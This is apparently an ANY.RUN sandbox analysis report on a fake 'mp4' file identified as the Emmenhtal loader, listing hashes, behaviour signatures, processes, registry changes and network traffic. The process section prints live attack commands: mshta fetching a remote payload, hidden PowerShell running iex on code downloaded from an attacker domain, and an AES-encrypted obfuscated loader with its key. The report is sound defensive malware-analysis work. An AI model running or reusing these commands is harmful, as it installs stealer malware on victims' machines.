download:

/s7.mp4

Full analysis: https://app.any.run/tasks/cf25a2c7-70be-483f-a6f9-97c8367438c1
Verdict: Malicious activity
Threats:

First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments.

Analysis date: December 28, 2024, 22:08:08
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
emmenhtal
loader
reflection
Indicators:
MIME: application/octet-stream
File info: data
MD5:

09462E0F1E25DFBD0E35BA3DC9E11ADC

SHA1:

A52D09AB6C29CEB850C093C812557982BB2BDE8D

SHA256:

71E46B518C42C14C906E8885396FEBF9A1F77F9EA97D865A67DF7A37661FBF0D

SSDEEP:

12288:68dk9WbfQGdOnIVrBH5QGdO+IVbBHv+GdOnIVQQ5dOnIVJQGdO3IVUQGdO+IVQQW:5QoBH5Q1BHv+BQBQvQ6QHQvQrQbwqBHD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • EMMENHTAL loader has been detected

      • powershell.exe (PID: 4320)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4320)
      • powershell.exe (PID: 3128)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 4320)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3128)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 3128)
      • powershell.exe (PID: 4320)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 4320)
    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 5888)
  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 4320)
      • powershell.exe (PID: 3128)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 5888)
      • powershell.exe (PID: 4320)
    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 5888)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 4320)
      • mshta.exe (PID: 5888)
    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 4320)
    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 3128)
    • Probably download files using WebClient

      • powershell.exe (PID: 4320)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3128)
    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 4320)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 4320)
  • INFO

    • The process uses the downloaded file

      • cmd.exe (PID: 3952)
      • mshta.exe (PID: 5888)
      • powershell.exe (PID: 4320)
    • Checks proxy server information

      • mshta.exe (PID: 5888)
      • powershell.exe (PID: 3128)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 5888)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 4320)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4320)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4320)
    • Disables trace logs

      • powershell.exe (PID: 3128)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3128)
      • powershell.exe (PID: 4320)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs vlc.exe mshta.exe #EMMENHTAL powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3128"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/singl7.pptx'))" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
3952"C:\Windows\System32\cmd.exe" /k C:\Users\admin\Desktop\s7.mp4C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
4320"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function yKEIJ($WJea){return -split ($WJea -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$vdIw = yKEIJ('0D545E5AD295CBD34F30F8ECA0361D979D282159DA768EBA4293AC0A9A7AC2F2A276AEC2C67F081B3D25DB62B77D656A96A7E6ADE2198123F4E83FFC4D308550286DA7510F8FE787E676D4C50CB08353F49BC289FA71DAA7F78163FC841E6D90921648D56F61C91F6B19837649AD60732DE900CC9C07F42FBEFBE6713AFE432BEAA38869AEF1B7A559BB9E52DE58A09BB5E5C76B6EE3A0C3580B52A8D6703FAE93638C20225CBCABB996CDD2D9C55FEB2AD00C5F0020BAF65356562C2BB8043B83EDF1D58741773F50AA02353BF6ACE760267B639D79A01A0DC44C6076E6787136478E423D37C66BFAADF08E156C4BFAEE4EA1F03C61525DAF1E3DD46B8FCD21F4E628550C7DD3F32FC645557DFDE696B0F02366D01F3BBDB1A958B8A245D273A67DEB66238B42574BE546F463DFBCD6D8C52A108EAD4709630856C05BC548666A37E58FF4C4E96CCDB169A3CF89304FDFE47586F572A3CE74C2E32D87543108731DC657AF6350DD8CC4D564953246C9A8F9E7B8D9488CB2CB887FDABAFD42F2BA8483106D1D192915DB4AFAA1B71B80EC738AD02A209C933C0B691C99CE6372317440C7C11847E17E190EDF6095A197D6DF680402165C01C257E8F1966E2B4B36FB1BA13396DA8C731B4F011FC7F537F79912CDFC7FD63170C45C0FB6D769C3EE2F9299C06AD23D511EE9D3FC7A4E355966EB7D4FAB8DA8261457BB8EB6D55D3C2342265E985ABAA2EA7E619792D81C51697C35BA703CF462ED782F9DCC33BBF1A9873B791C023B13411435C3332C4FB89586F99BBAA97CCBFABC4808FA0A28265A41AD0200E9D84359BC22755892A7D717DA43EAFFC8AFDF663096BB364720A6E2F123E6C0AD64A2413168171AC934E50C51C2A7BAA0B2D055A3AD27046734C73AD4C7554063769E6240CA1D4E697A3215DDC5FD472E59D3E4FAFBC4EB675CAAD15557852454BB6A4452C543E5F81AC3D8AFFE508FD7A39B9FF194F71CC52907AA794994C95A8ECF92D456EF2FA41A26CE46B2BA35F4A9A26D4F8EF44987745441A53FB1D90A0F4B44369AFE291E245FFF20F826CC5244C6D5EB5BC84872C5A8CEF293C00DFA183712829C3B7285EA2B407A0511B4245122E13910F8D375578707E4254D5A7BA4791AE839DA856DF035584CFFD3CEDF521A47C76803767AE10CF25ED8C7877D9D3D548193A6F406BE7DBD56DE84D1F1E6C6D48F044370BE062CF1BBEF6060F53D2ECBC8F3662342E948AD8A2253838EF894402119BBAA301CF8899E93ECA63F42DC7C2A819749CCB9866BEC27C3253CF6D84BB7AA766E485425A3E6023617852CCCD5038602898DA269230B2579E92DCE48D2B4517CC12C2A867B54B086E9793D77C63B000D9EB0742036B409171B494473613AC489582DB1F6C4862A388E3040F48A36DCE233EA85F37F99EFE44981A2C47F45C919B5E7354412A1710498178803D0236222C25B6DCFD9C39E55F018FBCAEA59EF65F16434DB5DEA94C95874736E812FC165456D83454370DB1D610954DC73147E1351237485BD72BA306B98BF5E9DC9D795484D8E4E320F762836112F976E3FEB1114161DB2816B4C8B852DB572D58E1154CD37F00832C34F8A15223576622EDBCE04C707D0E72E233FEB7E6B104486815DA8E2DABD2208A16E7C35C3DDC8EDED465DED951E2FF924DD2B0A3C8E869EBB4E66C3DF8C23BB42285097A95C9E5947428E9B97A64B1B2BB4E391A27920CB73D46264F04F68CE2F15F8EACE66501EF3E68BAB9B53173BCAE5A0029396B50B679F4EC9CFE3F288D880F7577C234ED0E7C6FE185FA40B58198BD29D756D68FD89FF9E7F495C43547D7C03449DDD3E85AD9ADB3E96932540A927097E575D66A0AA2F25CD619466EC31E525BAF4136411175A2D464B46CEDF892021A692DDED56778F5CEE89DC4CD8C113379035425834E0CE380FD608895381DAA0B83B31741AB337779F3D20724CB624B24EDBF5AC2172714A29331C0906CCB7AF128C69C8D96B4B6C76EC05E67BDF1A6691C4EA08F78C3AD20BB630EBDCDC3B186986D496414B2C84B96F3D846C17C48C05E36FF098D977D5DB670D7611FCC707F34FD1BFE6700EF5B8DE4DAB8CBD6AAF9772EBC0273CD736E967412CA8028EAB89A1BF8518DF75DB1D1331A8912BC6F319EF76964AD3471CCDC0896B984A177BA525F4B3BA74745BD2948CE5C3163E6D1336C0796824AC4BFCB9F4315150ACB5BD58A0D1CF7B95934141C540CE24A99B361B5DF7CEB9346FB1643620C2FAD69C33B735B0FE9AC7571B377902BF86C4BA6FBA55B0B6D089EA9D79AD3A05CCF0639FA57269C0FA7246A481002DCF1233149B437A00729CD36C3BD81E8C80AF7FBBF0263F2CD2D9C451A3C4D7DE24253FB6329EDF25E4080B6433B6');$vXUtz=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((yKEIJ('684878544146654C416C6D7375785778')),[byte[]]::new(16)).TransformFinalBlock($vdIw,0,$vdIw.Length)); & $vXUtz.Substring(0,3) $vXUtz.Substring(129)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5556\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5752\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5888mshta https://savecoupons.store/s7.mp4C:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
6176"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\admin\Desktop\s7.mp4"C:\Program Files\VideoLAN\VLC\vlc.exe
cmd.exe
User:
admin
Company:
VideoLAN
Integrity Level:
MEDIUM
Description:
VLC media player
Exit code:
0
Version:
3.0.11
Modules
Images
c:\windows\system32\dxcore.dll
c:\program files\videolan\vlc\plugins\misc\libexport_plugin.dll
6504\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
17 199
Read events
17 180
Write events
19
Delete events
0

Modification events

(PID) Process:(3952) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp4\OpenWithProgids
Operation:writeName:VLC.mp4
Value:
(PID) Process:(3952) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value:
01000000000000001AB560FD7459DB01
(PID) Process:(5888) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5888) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5888) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(3128) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3128) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3128) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3128) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(3128) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
Executable files
4
Suspicious files
7
Text files
7
Unknown types
0

Dropped files

PID
Process
Filename
Type
6176vlc.exe
MD5:
SHA256:
6176vlc.exeC:\Users\admin\AppData\Roaming\vlc\vlc-qt-interface.ini.YE6176text
MD5:9F81B8E6E6C5D9654E85AFF28D6AF13D
SHA256:CE91430DD8BB5E3D3E7A19F5E6C66974B9B510366791CFCDB7F303FB350E9535
6176vlc.exeC:\Users\admin\AppData\Roaming\vlc\vlc-qt-interface.initext
MD5:9F81B8E6E6C5D9654E85AFF28D6AF13D
SHA256:CE91430DD8BB5E3D3E7A19F5E6C66974B9B510366791CFCDB7F303FB350E9535
6176vlc.exeC:\Users\admin\AppData\Roaming\vlc\ml.xspf.tmp6176xml
MD5:781602441469750C3219C8C38B515ED4
SHA256:81970DBE581373D14FBD451AC4B3F96E5F69B79645F1EE1CA715CFF3AF0BF20D
6176vlc.exeC:\Users\admin\AppData\Roaming\vlc\vlc-qt-interface.ini.locktext
MD5:57391A8724B56F6AFB667C684E272BE2
SHA256:54ABB6E6B6AD294C136BCA4B32D0529F0CD4F2A00FD878B5F06085615D1628AB
5888mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:20209E1C9EE4595EAC38112A3BA8D1FF
SHA256:F75AADEAC626CC470CEF7B96BE2F45E0324138600720688D82732FD1FB5F680F
6176vlc.exeC:\Users\admin\AppData\Roaming\vlc\vlc-qt-interface.ini.nd6176text
MD5:E2A6C45EDEB12EC821329A1E046EC0B6
SHA256:E2E06092A205B69BF617E0649F1C7E08A30575ED4473CF3866A547055C56B926
5888mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:76606D47641BEF18343CFFA94CCCD6A4
SHA256:140BAF0A0B3F18AE4DE737288F6BB3B34F62064B63B019187E98175C49D0747F
3128powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wasrnf54.5vo.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3128powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_k4dllu0y.xpr.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
36
DNS requests
21
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5448
svchost.exe
GET
200
2.20.245.138:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.20.245.138:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5448
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6276
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7100
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5888
mshta.exe
GET
200
172.217.16.131:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
5888
mshta.exe
GET
200
172.217.16.131:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
unknown
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5448
svchost.exe
2.20.245.138:80
crl.microsoft.com
Akamai International B.V.
SE
unknown
4712
MoUsoCoreWorker.exe
2.20.245.138:80
crl.microsoft.com
Akamai International B.V.
SE
whitelisted
5448
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
unknown
2.23.209.177:443
www.bing.com
Akamai International B.V.
GB
whitelisted
40.126.32.72:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 2.20.245.138
  • 2.20.245.137
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
google.com
  • 172.217.16.142
whitelisted
www.bing.com
  • 2.23.209.177
  • 2.23.209.140
  • 2.23.209.179
  • 2.23.209.189
  • 2.23.209.149
  • 2.23.209.176
  • 2.23.209.182
  • 2.23.209.187
  • 2.23.209.133
whitelisted
login.live.com
  • 40.126.32.72
  • 40.126.32.136
  • 20.190.160.17
  • 20.190.160.22
  • 40.126.32.74
  • 40.126.32.68
  • 20.190.160.20
  • 40.126.32.138
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
fd.api.iris.microsoft.com
  • 20.223.35.26
whitelisted

Threats

No threats detected
Process
Message
vlc.exe
main libvlc debug: exiting
vlc.exe
main libvlc debug: exiting
vlc.exe
main interface debug: removing module "qt"
vlc.exe
main libvlc debug: no exit handler
vlc.exe
main playlist debug: deactivating the playlist
vlc.exe
main audio output debug: removing module "mmdevice"
vlc.exe
qt interface debug: requesting exit...
vlc.exe
main libvlc debug: removing all interfaces
vlc.exe
qt interface debug: waiting for UI thread...
vlc.exe
qt interface debug: Video is not needed anymore